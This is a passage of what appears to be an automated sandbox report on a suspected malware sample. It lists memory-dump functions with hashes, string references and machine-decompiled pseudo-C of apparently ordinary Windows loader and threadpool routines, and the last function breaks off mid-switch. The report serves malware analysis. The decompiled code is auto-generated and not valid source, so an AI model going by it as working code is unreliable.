0x36b5e3e1
0x00000000

Strings

Legacy, xrefs: 36B5E3DA
UEFI, xrefs: 36B5E3D1

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 12721c30b2d0545aab5433a9ed488367c7ea4728a0f6817a23b65c592fc744c4
Instruction ID: 7ac5d7717ae251d57aa6569e9092bb4c53e6baac148db74eceb213015dafd926
Opcode Fuzzy Hash: 12721c30b2d0545aab5433a9ed488367c7ea4728a0f6817a23b65c592fc744c4
Instruction Fuzzy Hash: E4616BB1E007189FEB15CFA9D840AAEBBF8FB48744F55406AE649EB251EB30D901CF54

Uniqueness

Uniqueness Score: -1.00%

Function 36BBB55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 36BBB5C4
RedirectedKey, xrefs: 36BBB60E

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
API String ID: 0-1388552009
Opcode ID: ee8433523fb598d40e5d8a0f3003999067ce5d4ea8c77b5f055c1f289a03e614
Instruction ID: a6a67bcc8e26edb795d78de073cc15c202387b0f3020217147d41802c1e2abea
Opcode Fuzzy Hash: ee8433523fb598d40e5d8a0f3003999067ce5d4ea8c77b5f055c1f289a03e614
Instruction Fuzzy Hash: 046116B5C00228EFDF11DF95C988ADEBFB9FB08705F50405AE905A7250DBB49A46CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 36AFF640 Relevance: 2.7, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E36AFF640(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t76;
				void* _t85;
				intOrPtr _t89;
				intOrPtr _t96;
				signed int _t99;
				signed int _t109;
				signed int _t114;
				signed int _t117;
				void* _t120;
				intOrPtr _t123;
				signed int _t128;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t137;
				void* _t139;
				void* _t141;

				_push("true");
				_push(0x36bbc3a0);
				E36B37BE4(__ebx, __edi, __esi);
				_t137 =  *[fs:0x18];
				 *((intOrPtr*)(_t139 - 0x24)) = _t137;
				_t74 =  *[fs:0x30];
				 *((intOrPtr*)(_t139 - 0x2c)) =  *[fs:0x30];
				_t128 =  *(_t137 + 0xfb4);
				 *(_t139 - 0x20) = _t128;
				if(_t128 != 0) {
					_push("true");
					_t121 = _t128;
					E36AE4779(_t74, _t128);
				}
				if(( *( *[fs:0x18] + 0xfca) & 0x00000008) != 0) {
					_t76 =  *[fs:0x18];
					__eflags =  *(_t76 + 0xfca) & 0x00000020;
					if(( *(_t76 + 0xfca) & 0x00000020) == 0) {
						L26:
						_t109 = 0;
						L19:
						__eflags = _t128;
						if(_t128 != 0) {
							 *(_t137 + 0xfb4) = _t109;
							_push(2);
							_t121 = _t128;
							E36AE4779(_t76, _t128);
						}
						_t129 =  *(_t137 + 0xf94);
						__eflags = _t129;
						if(_t129 != 0) {
							 *(_t137 + 0xf94) = _t109;
							E36AEFED0(0x36bd5b40);
							_push(0x36bd5b40);
							E36AEE740(_t111);
							E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109, _t129);
						}
						__eflags =  *(_t137 + 0xfca) & 0x00000004;
						if(( *(_t137 + 0xfca) & 0x00000004) != 0) {
							 *(_t137 + 0x10) = _t109;
							E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109,  *(_t137 + 0x10));
						}
						E36B14940();
						_t85 = 0x400;
						__eflags =  *(_t137 + 0xfca) & 0x00000400;
						if(( *(_t137 + 0xfca) & 0x00000400) != 0) {
							__eflags =  *0x36bd65f4 - 3;
							if( *0x36bd65f4 == 3) {
								_t85 = E36BB4080(_t111, _t121);
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0x10));
						return _t85;
					}
				}
				_t76 = 0x2000;
				if(( *(_t137 + 0xfca) & 0x00002000) != 0) {
					goto L26;
				}
				_t111 = 0x1000;
				_t109 = 0;
				if(( *( *[fs:0x18] + 0xfca) & 0x00001000) != 0) {
					 *((char*)(_t139 - 0x19)) = 1;
				} else {
					 *((char*)(_t139 - 0x19)) = 0;
					_t111 = 0;
					E36B019DF(0);
				}
				E36B02755(_t121);
				 *(_t139 - 4) = _t109;
				_t89 =  *0x36bd5da0; // 0x68d0c58
				while(_t89 != 0x36bd5d9c) {
					_t16 = _t89 - 0x10; // 0x68d0c48
					_t123 = _t16;
					 *((intOrPtr*)(_t139 - 0x30)) = _t123;
					_t18 = _t89 + 4; // 0x68d0a48
					_t96 =  *_t18;
					 *((intOrPtr*)(_t139 - 0x28)) = _t96;
					 *((intOrPtr*)(_t139 - 0x38)) = _t96;
					_t21 = _t123 + 0x34; // 0x8a2cc
					_t111 =  *_t21;
					_t24 = _t123 + 0x18; // 0x761a0000
					if( *((intOrPtr*)( *((intOrPtr*)(_t139 - 0x2c)) + 8)) !=  *_t24 && (_t111 & 0x00040000) == 0) {
						_t27 = _t123 + 0x1c; // 0x761d5cd0
						_t99 =  *_t27;
						 *(_t139 - 0x34) = _t99;
						if(_t99 != 0 && _t111 == 0x80004) {
							 *(_t139 - 0x3c) = _t99;
							 *((intOrPtr*)(_t139 - 0x60)) = 0x24;
							 *(_t139 - 0x5c) = 1;
							_t117 = 7;
							memset(_t139 - 0x58, 0, _t117 << 2);
							_t141 = _t141 + 0xc;
							_t34 = _t123 + 0x48; // 0x0
							E36AFDC40(_t139 - 0x60,  *_t34);
							 *(_t139 - 4) = 1;
							_t135 =  *((intOrPtr*)(_t139 - 0x30));
							_t155 =  *((intOrPtr*)(_t135 + 0x3a)) - _t109;
							if( *((intOrPtr*)(_t135 + 0x3a)) != _t109) {
								_t120 = 3;
								E36AFF0A3(_t109, _t120, _t135, _t135, _t137, _t155);
							}
							_push(_t109);
							_push(3);
							_t111 =  *(_t139 - 0x34);
							E36AFDCD1(_t109,  *(_t139 - 0x34),  *((intOrPtr*)(_t135 + 0x18)), _t135, _t137, _t155);
							 *(_t139 - 4) = _t109;
							_t128 =  *(_t139 - 0x20);
							E36AFF85E();
						}
					}
					_t89 =  *((intOrPtr*)(_t139 - 0x28));
				}
				_t121 =  *0x36bd5b24; // 0x68b2ce0
				__eflags =  *((intOrPtr*)(_t121 + 0x3a)) - _t109;
				if( *((intOrPtr*)(_t121 + 0x3a)) != _t109) {
					 *((intOrPtr*)(_t139 - 0x84)) = 0x24;
					 *(_t139 - 0x80) = 1;
					_t114 = 7;
					__eflags = 0;
					memset(_t139 - 0x7c, 0, _t114 << 2);
					_t49 = _t121 + 0x48; // 0x0
					E36AFDC40(_t139 - 0x84,  *_t49);
					 *(_t139 - 4) = 2;
					_t121 =  *0x36bd5b24; // 0x68b2ce0
					_t111 = 3;
					E36AFF0A3(_t109, _t111, _t121, _t139 - 0x7c + _t114, _t137, __eflags);
					 *(_t139 - 4) = _t109;
					_t128 =  *(_t139 - 0x20);
					E36AFF87D();
				}
				 *(_t139 - 4) = 0xfffffffe;
				E36AFF867(_t109, _t111);
				_t76 = E36B16540(_t111);
				goto L19;
			}

0x36aff640
0x36aff642
0x36aff647
0x36aff64c
0x36aff653
0x36aff656
0x36aff65c
0x36aff65f
0x36aff665
0x36aff66a
0x36aff66c
0x36aff66e
0x36aff670
0x36aff670
0x36aff682
0x36b49c28
0x36b49c2e
0x36b49c35
0x36aff857
0x36aff857
0x36aff7da
0x36aff7da
0x36aff7dc
0x36aff7de
0x36aff7e4
0x36aff7e6
0x36aff7e8
0x36aff7e8
0x36aff7ed
0x36aff7f3
0x36aff7f5
0x36aff82b
0x36aff836
0x36aff83b
0x36aff840
0x36aff850
0x36aff850
0x36aff7f7
0x36aff7fe
0x36b49c79
0x36b49c87
0x36b49c87
0x36aff804
0x36aff809
0x36aff80e
0x36aff815
0x36b49c91
0x36b49c98
0x36b49c9e
0x36b49c9e
0x36b49c98
0x36aff81e
0x36aff82a
0x36aff82a
0x36b49c3b
0x36aff688
0x36aff694
0x00000000
0x00000000
0x36aff6a0
0x36aff6a5
0x36aff6ae
0x36b49c40
0x36aff6b4
0x36aff6b4
0x36aff6b7
0x36aff6b9
0x36aff6b9
0x36aff6be
0x36aff6c3
0x36aff6c6
0x36aff6cb
0x36aff6d6
0x36aff6d6
0x36aff6d9
0x36aff6dc
0x36aff6dc
0x36aff6df
0x36aff6e2
0x36aff6e5
0x36aff6e5
0x36aff6ee
0x36aff6f1
0x36aff6fb
0x36aff6fb
0x36aff6fe
0x36aff703
0x36aff713
0x36aff716
0x36aff71d
0x36aff726
0x36aff72c
0x36aff72c
0x36aff72e
0x36aff734
0x36aff739
0x36aff740
0x36aff743
0x36aff747
0x36aff74d
0x36aff74e
0x36aff74e
0x36aff753
0x36aff754
0x36aff759
0x36aff75c
0x36aff761
0x36aff764
0x36aff767
0x36aff767
0x36aff703
0x36aff76c
0x36aff76c
0x36aff774
0x36aff77a
0x36aff77e
0x36aff780
0x36aff78a
0x36aff793
0x36aff794
0x36aff799
0x36aff79b
0x36aff7a4
0x36aff7a9
0x36aff7b0
0x36aff7b8
0x36aff7b9
0x36aff7be
0x36aff7c1
0x36aff7c4
0x36aff7c4
0x36aff7c9
0x36aff7d0
0x36aff7d5
0x00000000

Strings

$, xrefs: 36AFF780
$, xrefs: 36AFF716

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: 77155f121bd6f8928a5f9f5d8216b685595a1148379c280b185026f31f4114c4
Instruction ID: 9f4e7abb6ed90756282e95919bd41250baf9860700a099d35dfcbbcff9fb219f
Opcode Fuzzy Hash: 77155f121bd6f8928a5f9f5d8216b685595a1148379c280b185026f31f4114c4
Instruction Fuzzy Hash: 3061CC76E10749CBEB20DFA4CE80B9DBBB1FB04308F104469E9046F691DB76A941CF92

Uniqueness

Uniqueness Score: -1.00%

Function 36B133D0 Relevance: 2.6, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E36B133D0(signed int* __ecx, signed int __edx, void* _a4) {
				signed int _v8;
				void* _t17;
				signed int* _t26;
				signed int _t29;
				void* _t34;
				signed int _t41;

				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t26 = __ecx;
				_t41 = __edx;
				if(__ecx == 0 || __edx == 0) {
					_push(_t41);
					_push(_t26);
					E36B6EF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Map        : 0x%p\nSXS:    EntryCount : 0x%lx\n", "RtlpInitializeAssemblyStorageMap");
					_t17 = 0xc000000d;
				} else {
					_t34 = _a4;
					if(_t34 == 0) {
						_push("true");
						_pop(_t29);
						_t17 = E36B14CF8( &_v8, __edx * _t29, __edx * _t29 >> 0x20);
						if(_t17 >= 0) {
							_t34 = E36AF5D90( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
							if(_t34 != 0) {
								_v8 = 1;
								goto L3;
							} else {
								_t17 = 0xc0000017;
							}
						}
					} else {
						L3:
						if(_t41 != 0) {
							memset(_t34, 0, _t41 << 2);
						}
						 *_t26 = _v8;
						_t17 = 0;
						_t26[1] = _t41;
						_t26[2] = _t34;
					}
				}
				return _t17;
			}

0x36b133d5
0x36b133d6
0x36b133d7
0x36b133dd
0x36b133df
0x36b133e4
0x36b52898
0x36b52899
0x36b528a8
0x36b528b0
0x36b133f2
0x36b133f2
0x36b133f7
0x36b52850
0x36b52852
0x36b5285c
0x36b52863
0x36b5287c
0x36b52880
0x36b5288c
0x00000000
0x36b52882
0x36b52882
0x36b52882
0x36b52880
0x36b133fd
0x36b133fd
0x36b133ff
0x36b13407
0x36b13407
0x36b1340c
0x36b1340e
0x36b13410
0x36b13413
0x36b13413
0x36b133f7
0x36b1341a

Strings

SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 36B5289F
RtlpInitializeAssemblyStorageMap, xrefs: 36B5289A

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: fa7e6b305fdb19047838270d151b76027d9ea67af108a1db9d2aee364567224c
Instruction ID: aa4d4a098a757670ab51995ba01169deb6c3b14f6409b6fdb31715ebf49ca012
Opcode Fuzzy Hash: fa7e6b305fdb19047838270d151b76027d9ea67af108a1db9d2aee364567224c
Instruction Fuzzy Hash: E31129B6F01224FBF7158B89CD41F9B76A8DB84754F118029BA04DB244EA75DD008FB5

Uniqueness

Uniqueness Score: -1.00%

Function 36B1A4F0 Relevance: 2.5, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E36B1A4F0() {
				char _v1052;
				signed int _v1056;
				void* __ebp;
				intOrPtr _t12;
				void* _t15;
				intOrPtr _t19;
				intOrPtr* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t29;

				_push(L"Cleanup Group");
				_push(L"Threadpool!");
				_push(0);
				_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
				_t12 = E36B1A580(_t22, _t23, _t24, _t25, _t29);
				_v1056 = _v1056 & 0x00000000;
				 *0x36bd6644 = _t12;
				_push( &_v1056);
				_push(0x408);
				_push( &_v1052);
				_push(0x37);
				_t15 = E36B22D10();
				if(_t15 >= 0) {
					if(_v1056 < 4) {
						return 0xc00000e5;
					}
					 *0x36bd6640 = _v1052 + 1;
					_t19 =  *[fs:0x30];
					 *(_t19 + 0x250) =  *(_t19 + 0x250) & 0x00000000;
					_t20 = _t19 + 0x254;
					 *((intOrPtr*)(_t20 + 4)) = _t20;
					 *_t20 = _t20;
					return 0;
				}
				return _t15;
			}

0x36b1a504
0x36b1a509
0x36b1a50e
0x36b1a510
0x36b1a513
0x36b1a518
0x36b1a51d
0x36b1a526
0x36b1a527
0x36b1a530
0x36b1a531
0x36b1a533
0x36b1a53a
0x36b1a541
0x00000000
0x36b1a56a
0x36b1a548
0x36b1a54d
0x36b1a553
0x36b1a55a
0x36b1a55f
0x36b1a562
0x00000000
0x36b1a564
0x36b1a569

Strings

Threadpool!, xrefs: 36B1A509
Cleanup Group, xrefs: 36B1A504

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: b708555b69e5daf759f6eab7dc61d7267137fe24e6846134e51e23281bc8b2c5
Instruction ID: af0b3cdbb805b1b6b9604b3deecc55929f213d5c512280a97ab683937a4376f8
Opcode Fuzzy Hash: b708555b69e5daf759f6eab7dc61d7267137fe24e6846134e51e23281bc8b2c5
Instruction Fuzzy Hash: 7E01A9B2528700EFE311DF24CD05B167BE8EB40B19F008979AA5CCB590E778E904CF46

Uniqueness

Uniqueness Score: -1.00%

Function 36AEC6E0 Relevance: 2.2, Strings: 1, Instructions: 960
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E36AEC6E0(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v60;
				signed short _v64;
				char _v65;
				signed int _v72;
				signed int _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int* _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void* _v140;
				signed char _v144;
				signed int _v148;
				signed int _v152;
				char _v153;
				signed char _v160;
				signed int _v164;
				void* _v168;
				signed int _v172;
				signed short _v176;
				signed short _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* _v196;
				signed int _v200;
				char _v204;
				intOrPtr _v208;
				signed int _v212;
				char _v220;
				char _v228;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t428;
				signed int _t429;
				signed int _t435;
				signed char _t437;
				signed int _t443;
				signed int _t446;
				signed char _t448;
				signed int _t461;
				signed int _t463;
				signed int _t465;
				signed short _t475;
				signed int _t478;
				signed int* _t480;
				signed int _t481;
				signed short _t482;
				signed int _t486;
				signed char _t488;
				signed int _t501;
				signed int _t503;
				signed int _t509;
				signed int _t510;
				signed int _t520;
				signed int _t536;
				signed int _t537;
				signed int _t539;
				signed int _t540;
				signed int _t543;
				signed int _t544;
				signed int _t546;
				signed int _t551;
				signed int _t555;
				void* _t556;
				signed int _t559;
				signed int _t565;
				signed char _t566;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t573;
				signed short _t576;
				char _t581;
				signed int _t583;
				signed int _t587;
				signed int _t588;
				signed int _t592;
				signed int _t597;
				intOrPtr _t598;
				signed int _t599;
				signed int _t601;
				signed int* _t602;
				signed int _t607;
				signed int _t615;
				signed int _t617;
				signed int _t620;
				signed int _t624;
				void* _t625;
				signed int _t626;
				signed int _t627;
				intOrPtr* _t630;
				intOrPtr _t633;
				signed int _t638;
				void* _t639;
				signed char _t640;
				intOrPtr* _t642;
				signed int _t645;
				signed int _t647;
				void* _t648;

				_t612 = __edx;
				_push(0xfffffffe);
				_push(0x36bbc008);
				_push(E36B2AD20);
				_push( *[fs:0x0]);
				_t428 =  *0x36bdb370;
				_v12 = _v12 ^ _t428;
				_t429 = _t428 ^ _t647;
				_v32 = _t429;
				_push(_t429);
				 *[fs:0x0] =  &_v20;
				_v28 = _t648 - 0xd0;
				_v100 = __edx;
				_t624 = __ecx;
				_v96 = __ecx;
				_v152 = __edx;
				_v108 = _a12;
				_v92 = __edx;
				_v65 = 0;
				_v172 = 0;
				_v164 = 0;
				_t638 = _a4;
				_t555 = _a8;
				if(_t638 >= 3 || (_t555 & 0x00000002) != 0) {
					if(_t638 > 4) {
						goto L232;
					}
					_t435 = _t555 & 0x00000041;
					if(_t435 == 0 || _t638 == 4) {
						if(_t638 != 4) {
							L9:
							_t565 = _t638;
							_v88 = _t638;
							L10:
							_v124 = _t565;
							_v8 = 0;
							_t437 =  !_t555;
							_v144 = _t437;
							if((_t437 & 0x00000010) == 0) {
								L25:
								_v80 = 1;
								_t566 = _v96;
								_t640 = _t566;
								_v160 = _t566;
								_v120 = 0;
								_t626 = 0;
								_v128 = 0;
								if((_t566 & 0x00000003) != 0) {
									asm("sbb al, al");
									_v80 =  !( ~(_t566 & 0x00000001)) & 0x00000001;
									_v160 = _t640;
								}
								_t612 = E36AEE580("true", _t640, 0, 0,  &_v120);
								_t567 = _v120;
								if(_t567 == 0) {
									L76:
									if(_t612 >= 0) {
										L79:
										_v188 = _t626;
										if(_t626 != 0) {
											_t432 = E36AEAB70(_t555, _t626, _t640, __eflags, _v96,  &_v172, "true", "true");
											_v72 = _t432;
											__eflags = _t432;
											if(_t432 < 0) {
												L68:
												_v8 = 0xfffffffe;
												goto L233;
											}
											_v148 = _t626;
											_v76 = 0xeeee;
											_v116 = 0;
											_t568 = 0;
											_v136 = 0;
											_v132 = 0;
											_v64 = 0;
											__eflags = 0;
											_v84 = 0;
											_v168 = 0;
											while(1) {
												__eflags = _t626;
												if(_t626 == 0) {
													goto L90;
												}
												_t481 = _v124;
												_t617 = _t481 - 1;
												_v124 = _t617;
												__eflags = _t481;
												if(_t481 == 0) {
													goto L90;
												}
												__eflags = _t617;
												_t612 = _v88;
												if(_t617 == 0) {
													__eflags = _t612 - 3;
													if(_t612 == 3) {
														_v132 = _t626;
													}
												}
												__eflags = _v132;
												if(_v132 == 0) {
													L169:
													_t576 =  *(_t626 + 0xe) & 0x0000ffff;
													_v176 = _t576;
													_v180 =  *(_t626 + 0xc) & 0x0000ffff;
													_t612 = _t576 & 0x0000ffff;
													_t432 = E36AD94A3( *(_t626 + 0xc) & 0xffff, _t576 & 0x0000ffff,  &_v204);
													_v72 = _t432;
													__eflags = _t432;
													if(_t432 < 0) {
														goto L68;
													}
													_t612 = 8;
													_t432 = E36B36D10(_v204, 8,  &_v220);
													_v72 = _t432;
													__eflags = _t432;
													if(_t432 < 0) {
														goto L68;
													}
													_t612 = _t626 + 0x10;
													_v212 = _t612;
													_t629 = _v96;
													_t581 = (_v96 & 0xfffffffc) + _v172;
													_v140 = _t581;
													__eflags = _v220 + _t612 - _t581;
													if(_v220 + _t612 <= _t581) {
														_t475 = _v180;
														_v144 = _t475;
														_t583 =  *_v100;
														__eflags = _t583 & 0xffff0000;
														if((_t583 & 0xffff0000) == 0) {
															_t612 = _t612 + (_t475 & 0x0000ffff) * 8;
															_v212 = _t612;
															_t475 = _v176;
															_v144 = _t475;
														}
														__eflags = _t475;
														if(_t475 != 0) {
															__eflags = _v132;
															if(_v132 == 0) {
																L206:
																_t612 = _v172;
																_t478 = E36B36E26(_t629, _v172, _v144, _v188, _v172, _t583,  &_v148,  &_v136);
																__eflags = _t478;
																if(_t478 == 0) {
																	goto L172;
																}
																_t480 =  &(_v100[1]);
																_v100 = _t480;
																_v152 = _t480;
																_t626 = _v148;
																_t568 = _v136;
																continue;
															}
															__eflags = _t555 & 0x00000020;
															if((_t555 & 0x00000020) == 0) {
																goto L206;
															}
															_t626 = 0;
															_v148 = 0;
															_v76 =  *_t612;
															_t568 =  *((intOrPtr*)(_t612 + 4)) + _v188;
															__eflags = _t568 - _v140;
															if(_t568 > _v140) {
																goto L172;
															}
															_v136 = _t568;
															goto L90;
														} else {
															_t587 = _v88;
															_t486 = _t587 - _v124 - 1;
															__eflags = _t486;
															if(_t486 == 0) {
																_t645 = 0xc000008a;
																L183:
																_v72 = _t645;
																_t630 = _v92;
																__eflags = _t555 & 0x02040000;
																if((_t555 & 0x02040000) != 0) {
																	L191:
																	__eflags = _t645 - 0xc000008a;
																	if(_t645 == 0xc000008a) {
																		L193:
																		_t488 =  !_t555;
																		__eflags = _t488 & 0x00080000;
																		if((_t488 & 0x00080000) != 0) {
																			__eflags = _t488 & 0x00020000;
																			if((_t488 & 0x00020000) != 0) {
																				__eflags = _t488 & 0x00000010;
																				if((_t488 & 0x00000010) != 0) {
																					__eflags = _t587 - 3;
																					if(_t587 == 3) {
																						_v48 =  *_t630;
																						_v44 =  *((intOrPtr*)(_t630 + 4));
																						_v40 =  *((intOrPtr*)(_t630 + 8));
																						_t588 = _a4;
																						__eflags = _t588 - 4;
																						if(_t588 == 4) {
																							_v36 =  *((intOrPtr*)(_t630 + 0xc));
																						}
																						_t612 =  &_v48;
																						_t558 = _v96;
																						_t645 = L36AEB9C0(_v96,  &_v48, _t588, _t555, _v108);
																						_v72 = _t645;
																						__eflags = _t645;
																						if(_t645 >= 0) {
																							_t612 = 0;
																							__eflags = 0;
																							E36AE0C12(_t558, 0,  &_v48, _a4);
																						}
																					}
																				}
																			}
																		}
																		L201:
																		_v8 = 0xfffffffe;
																		_t432 = _t645;
																		goto L233;
																	}
																	__eflags = _t645 - 0xc000008b;
																	if(_t645 != 0xc000008b) {
																		goto L201;
																	}
																	goto L193;
																}
																__eflags = _t587 - 3;
																if(_t587 != 3) {
																	goto L191;
																}
																_v48 =  *_t630;
																_v44 =  *((intOrPtr*)(_t630 + 4));
																_v40 =  *((intOrPtr*)(_t630 + 8));
																_t592 = _a4;
																__eflags = _t592 - 4;
																if(_t592 == 4) {
																	_v36 =  *((intOrPtr*)(_t630 + 0xc));
																}
																_t612 =  &_v48;
																_t501 = L36AEB9C0(_v96,  &_v48, _t592, _t555 | 0x01000000, _v108);
																_t587 = _v88;
																__eflags = _t501 - 0xc00b0001;
																if(_t501 != 0xc00b0001) {
																	__eflags = _t501 - 0xc00b0006;
																	if(_t501 == 0xc00b0006) {
																		goto L191;
																	}
																	_t645 = _t501;
																	L190:
																	_v72 = _t645;
																}
																goto L191;
															}
															_t503 = _t486 - 1;
															__eflags = _t503;
															if(_t503 == 0) {
																_t645 = 0xc000008b;
																goto L183;
															}
															__eflags = _t503 == 1;
															if(_t503 == 1) {
																_v72 = 0xc0000204;
																_v8 = 0xfffffffe;
																_t432 = 0xc0000204;
																goto L233;
															}
															_t645 = 0xc000000d;
															_t630 = _v92;
															goto L190;
														}
													}
													L172:
													_v8 = 0xfffffffe;
													_t432 = 0xc000007b;
													goto L233;
												} else {
													_v64 = 0;
													_t482 =  *((intOrPtr*)(_v92 + 8));
													_v84 = _t482;
													__eflags = 0x000003ff & _t482;
													_v65 = (0x000003ff & _t482) == 0;
													L107:
													_t465 = _v116;
													_v116 = _v116 + 1;
													__eflags = _t465 - 0xc;
													if(_t465 > 0xc) {
														L129:
														_v8 = 0xfffffffe;
														_t432 = 0xc0000204;
														goto L233;
													}
													switch( *((intOrPtr*)(_t465 * 4 +  &M36AED420))) {
														case 0:
															__eflags = 0 - _v84;
															if(0 != _v84) {
																__eflags = _t555 & 0x00080000;
																if((_t555 & 0x00080000) == 0) {
																	goto L139;
																}
																goto L112;
															}
															goto L110;
														case 1:
															__eax = __ebx;
															__eax =  !__ebx;
															__eflags = __eax & 0x00080000;
															if((__eax & 0x00080000) == 0) {
																goto L139;
															}
															__eflags = __eax & 0x00020000;
															if((__eax & 0x00020000) == 0) {
																goto L139;
															}
															__eflags = __al & 0x00000010;
															if((__al & 0x00000010) == 0) {
																goto L139;
															}
															__eax =  *__ecx;
															_v48 =  *__ecx;
															__eflags = __edx - 2;
															if(__edx < 2) {
																__eax = 0;
																__eflags = 0;
															} else {
																__eax =  *(__ecx + 4);
															}
															_v44 = __eax;
															__eflags = __edx - 3;
															if(__edx != 3) {
																__eax = 0;
																__eflags = 0;
															} else {
																__eax =  *(__ecx + 8);
															}
															_v40 = __eax;
															__edi = _a4;
															__eflags = __edi - 4;
															if(__edi == 4) {
																__eax =  *(__ecx + 0xc);
																_v36 =  *(__ecx + 0xc);
															}
															__edx =  &_v48;
															__ecx = _v96;
															__eax = L36AEB9C0(__ecx, __edx, __edi, __ebx, _v108);
															__esi = __eax;
															_v72 = __esi;
															__eflags = __esi;
															if(__esi < 0) {
																goto L139;
															} else {
																__eax =  &_v48;
																__edx = 0;
																__ecx = _v96;
																__eax = E36AE0C12(__ecx, 0,  &_v48, __edi);
																_v8 = 0xfffffffe;
																__eax = __esi;
																goto L233;
															}
														case 2:
															__eflags = _v65;
															if(_v65 == 0) {
																L112:
																_t643 = _v84;
																_v64 = _t643;
																goto L165;
															}
															__si = _v76;
															_v64 = __si;
															goto L165;
														case 3:
															__eflags = __bl & 0x00000004;
															if((__bl & 0x00000004) == 0) {
																__eflags = _v65;
																if(_v65 == 0) {
																	__edx =  &_v64;
																	__eax = E36AD88C8(__ecx, __edx);
																	__eflags = __eax;
																	if(__eax < 0) {
																		L110:
																		_t643 = 0;
																		_v64 = 0;
																		goto L165;
																	}
																	__si = _v64;
																	__eflags = __si;
																	if(__si != 0) {
																		_v116 = _v116 - 1;
																	}
																	goto L165;
																}
																__si = _v76;
																_v64 = __si;
																goto L165;
															}
															goto L129;
														case 4:
															__eflags = _v65;
															if(_v65 == 0) {
																__si = _v84;
																__si = _v84 & __di;
																_v64 = __si;
															} else {
																__si = _v76;
																_v64 = __si;
															}
															goto L165;
														case 5:
															__eflags = _v65;
															if(_v65 == 0) {
																goto L129;
															}
															goto L139;
														case 6:
															__si = _v76;
															_v64 = __si;
															__eflags = __bl & 0x00000020;
															if((__bl & 0x00000020) != 0) {
